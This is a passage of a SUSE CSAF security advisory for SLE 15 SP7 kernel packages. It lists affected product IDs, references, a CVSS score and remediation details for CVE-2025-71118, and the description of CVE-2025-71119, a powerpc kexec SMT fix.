"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71118",
"url": "https://www.suse.com/security/cve/CVE-2025-71118"
},
{
"category": "external",
"summary": "SUSE Bug 1256763 for CVE-2025-71118",
"url": "https://bugzilla.suse.com/1256763"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71118"
},
{
"cve": "CVE-2025-71119",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71119"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/kexec: Enable SMT before waking offline CPUs\n\nIf SMT is disabled or a partial SMT state is enabled, when a new kernel\nimage is loaded for kexec, on reboot the following warning is observed:\n\nkexec: Waking offline cpu 228.\nWARNING: CPU: 0 PID: 9062 at arch/powerpc/kexec/core_64.c:223 kexec_prepare_cpus+0x1b0/0x1bc\n[snip]\n NIP kexec_prepare_cpus+0x1b0/0x1bc\n LR kexec_prepare_cpus+0x1a0/0x1bc\n Call Trace:\n kexec_prepare_cpus+0x1a0/0x1bc (unreliable)\n default_machine_kexec+0x160/0x19c\n machine_kexec+0x80/0x88\n kernel_kexec+0xd0/0x118\n __do_sys_reboot+0x210/0x2c4\n system_call_exception+0x124/0x320\n system_call_vectored_common+0x15c/0x2ec\n\nThis occurs as add_cpu() fails due to cpu_bootable() returning false for\nCPUs that fail the cpu_smt_thread_allowed() check or non primary\nthreads if SMT is disabled.\n\nFix the issue by enabling SMT and resetting the number of SMT threads to\nthe number of threads per core, before attempting to wake up all present\nCPUs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71119",
"url": "https://www.suse.com/security/cve/CVE-2025-71119"
},
{
"category": "external",
"summary": "SUSE Bug 1256730 for CVE-2025-71119",
"url": "https://bugzilla.suse.com/1256730"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
